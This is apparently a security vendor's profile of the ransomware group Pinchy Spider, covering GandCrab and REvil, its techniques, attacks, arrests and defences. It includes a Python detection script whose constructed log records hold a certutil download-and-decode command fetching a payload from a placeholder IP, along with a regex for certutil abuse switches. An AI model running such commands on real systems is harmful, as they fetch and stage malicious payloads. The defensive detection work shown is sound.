Threat Actor Profile
Pinchy Spider
Pinchy Spider, also tracked as Gold Southfield, is a financially motivated, Russia-based cybercriminal group active since 2018. It is best known for developing and operating the GandCrab and REvil (Sodinokibi) ransomware families under a Ransomware-as-a-Service (RaaS) model, in which the core group maintains the malware and payment infrastructure while affiliates break into victims and split the proceeds. Affiliates favor high-value targets, moving laterally through victim networks and exfiltrating data before encryption so that the threat of a leak adds pressure to pay.
Pinchy Spider TTPs
Tactics
The group's objective is financial gain: extorting enterprises and critical-infrastructure operators by encrypting their systems and, in later operations, by threatening to publish stolen data.
Techniques
- Exploiting vulnerabilities in public-facing applications, for example the Oracle WebLogic deserialization flaw CVE-2019-2725, which was used to drop REvil in April 2019.
- Using stolen or brute-forced credentials to move laterally over RDP.
- Running phishing campaigns, typically with malicious attachments, to gain initial access.
Procedures
- Deploying GandCrab (2018-2019) and REvil (2019-2021) ransomware.
- Using Cobalt Strike for post-exploitation command and control, and abusing built-in Windows utilities such as certutil to download or decode payloads (living off the land).
- In early campaigns, encrypting individual hosts and demanding a ransom per host; later operations negotiated a single ransom for the whole environment and added data-leak extortion.
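Two of the procedures listed above leave traces that are easy to hunt for in ordinary Windows telemetry: certutil launched with download or decode switches, and one stolen account opening RDP sessions to many hosts in a short window. The script below is an added example written for this page, not Huntress's or any vendor's detection content. Every log record in it is constructed for the example; the field names imitate Sysmon Event ID 1 and Windows Security event 4624 but are not a real export, and the threshold and window values are illustrative choices.

```python
"""Toy detections for two Pinchy Spider tradecraft items: certutil abused as a
living-off-the-land downloader/decoder (ATT&CK T1105 / T1140), and RDP fan-out
by a single account (lateral movement with stolen credentials).
Example code added for this page, not a vendor's detection content.
All records below are constructed; field names mimic Sysmon EID 1 and
Windows Security 4624 but are not a real export."""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed process-creation records (Sysmon Event ID 1 style).
PROCESS_EVENTS = [
    {"host": "WS01", "image": r"C:\Windows\System32\certutil.exe",
     "cmdline": r"certutil.exe -urlcache -split -f http://203.0.113.5/x.txt C:\PerfLogs\x.txt"},
    {"host": "WS01", "image": r"C:\Windows\System32\certutil.exe",
     "cmdline": r"certutil.exe -decode C:\PerfLogs\x.txt C:\PerfLogs\svc.exe"},
    {"host": "WS02", "image": r"C:\Windows\System32\certutil.exe",
     "cmdline": "certutil -dump cert.cer"},     # ordinary admin use, must not fire
    {"host": "WS02", "image": r"C:\Windows\System32\certutil.exe",
     "cmdline": "certutil -store My"},          # ordinary admin use, must not fire
]

# Constructed logon records (Windows 4624; LogonType 10 = RemoteInteractive/RDP).
LOGON_EVENTS = [
    {"time": "2021-07-01T09:00:00", "user": r"CORP\svc_backup", "host": "WS03",  "src_ip": "10.0.5.23", "logon_type": 10},
    {"time": "2021-07-02T01:00:00", "user": r"CORP\svc_backup", "host": "FS01",  "src_ip": "10.0.5.23", "logon_type": 10},
    {"time": "2021-07-02T01:03:00", "user": r"CORP\svc_backup", "host": "DC01",  "src_ip": "10.0.5.23", "logon_type": 10},
    {"time": "2021-07-02T01:04:00", "user": r"CORP\svc_backup", "host": "FS01",  "src_ip": "10.0.5.23", "logon_type": 3},   # SMB, not RDP
    {"time": "2021-07-02T01:05:00", "user": r"CORP\svc_backup", "host": "SQL01", "src_ip": "10.0.5.23", "logon_type": 10},
    {"time": "2021-07-02T01:08:00", "user": r"CORP\svc_backup", "host": "APP01", "src_ip": "10.0.5.23", "logon_type": 10},
    {"time": "2021-07-02T08:30:00", "user": r"CORP\jdoe",       "host": "WS07",  "src_ip": "10.0.9.14", "logon_type": 10},
]

# Switches that turn certutil into a downloader or a base64 decoder/encoder.
# Windows accepts both "-" and "/" as the switch prefix.
CERTUTIL_ABUSE = re.compile(r"(?:^|\s)[-/](?:urlcache|decode|encode)\b", re.IGNORECASE)


def detect_certutil_abuse(events):
    """Return one alert per process event where certutil.exe is launched with a
    download or decode switch. Matching on the command line rather than the
    image name alone keeps -dump / -store style admin use out of the results."""
    alerts = []
    for e in events:
        image = e["image"].rsplit("\\", 1)[-1].lower()
        if image != "certutil.exe":
            continue
        m = CERTUTIL_ABUSE.search(e["cmdline"])
        if m:
            alerts.append({"host": e["host"], "switch": m.group(0).strip(),
                           "cmdline": e["cmdline"]})
    return alerts


def detect_rdp_fanout(events, threshold=3, window=timedelta(minutes=10)):
    """Flag accounts that open RDP sessions (logon type 10) to at least
    `threshold` distinct hosts inside any sliding `window`. Interactive users
    rarely do this; an operator pushing a payload host by host does."""
    by_user = defaultdict(list)
    for e in events:
        if e["logon_type"] != 10:
            continue
        by_user[e["user"]].append(
            (datetime.fromisoformat(e["time"]), e["host"], e["src_ip"]))

    alerts = {}
    for user, rows in by_user.items():
        rows.sort()
        start = 0
        for end in range(len(rows)):
            # Slide the left edge forward until the window fits.
            while rows[end][0] - rows[start][0] > window:
                start += 1
            span = rows[start:end + 1]
            hosts = {host for _, host, _ in span}
            # Keep the widest qualifying window seen for this account.
            if len(hosts) >= threshold and len(hosts) > len(alerts.get(user, {}).get("hosts", [])):
                alerts[user] = {"hosts": sorted(hosts),
                                "sources": sorted({ip for _, _, ip in span}),
                                "first": span[0][0].isoformat(),
                                "last": span[-1][0].isoformat()}
    return alerts


if __name__ == "__main__":
    for a in detect_certutil_abuse(PROCESS_EVENTS):
        print(f"[certutil] {a['host']}: {a['switch']} -> {a['cmdline']}")
    for user, a in detect_rdp_fanout(LOGON_EVENTS).items():
        print(f"[rdp fan-out] {user} -> {a['hosts']} from {a['sources']} "
              f"between {a['first']} and {a['last']}")
```

Run as-is it reports the two certutil download/decode launches on WS01 and the svc_backup account reaching four hosts over RDP within eight minutes, while ignoring the admin-style certutil invocations, the SMB logon, and the single RDP logon by jdoe. The sliding window matters: the same account's RDP logon the previous day is legitimately excluded, which is what keeps the rule from firing on a help-desk analyst who touches many machines over a shift.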
Notable Cyberattacks
Pinchy Spider has been linked to several significant cyberattacks:
GandCrab Campaigns (2018-2019): Distributed by affiliates through exploit kits, phishing and exposed RDP, GandCrab hit enterprises worldwide. When its operators announced their "retirement" in mid-2019 they claimed over $2 billion in ransom payments, a figure that has never been independently verified. The RaaS model let affiliates run attacks at a scale the core group could not have reached alone.
REvil Operations (2019-2021): Pinchy Spider moved to REvil (Sodinokibi), which became one of the most prevalent ransomware families of the period. High-profile incidents included the 2021 attack on the meat processor JBS and the supply-chain compromise of Kaseya VSA, which encrypted the downstream customers of managed service providers. The May 2021 Colonial Pipeline attack is often lumped in with REvil but was carried out by the separate DarkSide operation.
Law Enforcement & Arrests
Law enforcement agencies have made significant progress in combating Pinchy Spider and its affiliates:
In July 2020, Belarusian authorities arrested a GandCrab affiliate, the first publicly reported arrest tied to the operation.
In November 2021, Europol-coordinated actions led to the arrest of REvil affiliates in Romania and Kuwait; a Ukrainian affiliate charged over the Kaseya attack had been arrested in Poland the previous month.
In January 2022, Russia's FSB detained 14 alleged REvil members at the request of US authorities, and in October 2024 a St. Petersburg court sentenced four of them to prison terms of between four and a half and six years, a rare instance of Russian prosecution of a domestic ransomware crew.
How to Defend Against Pinchy Spider
Deploy endpoint detection and response and anti-phishing controls so that initial-access attempts and post-exploitation tooling such as Cobalt Strike are detected and blocked.
Patch internet-facing systems first, especially application servers and remote-access gateways, since exposed unpatched services were the group's preferred entry point.
Segment networks and lock down RDP (no direct internet exposure, multi-factor authentication for remote access, alerting on one account reaching many hosts) to limit lateral movement with stolen credentials.
Use Huntress Platform Tools to detect and mitigate ransomware threats effectively, ensuring robust protection against Pinchy Spider’s tactics.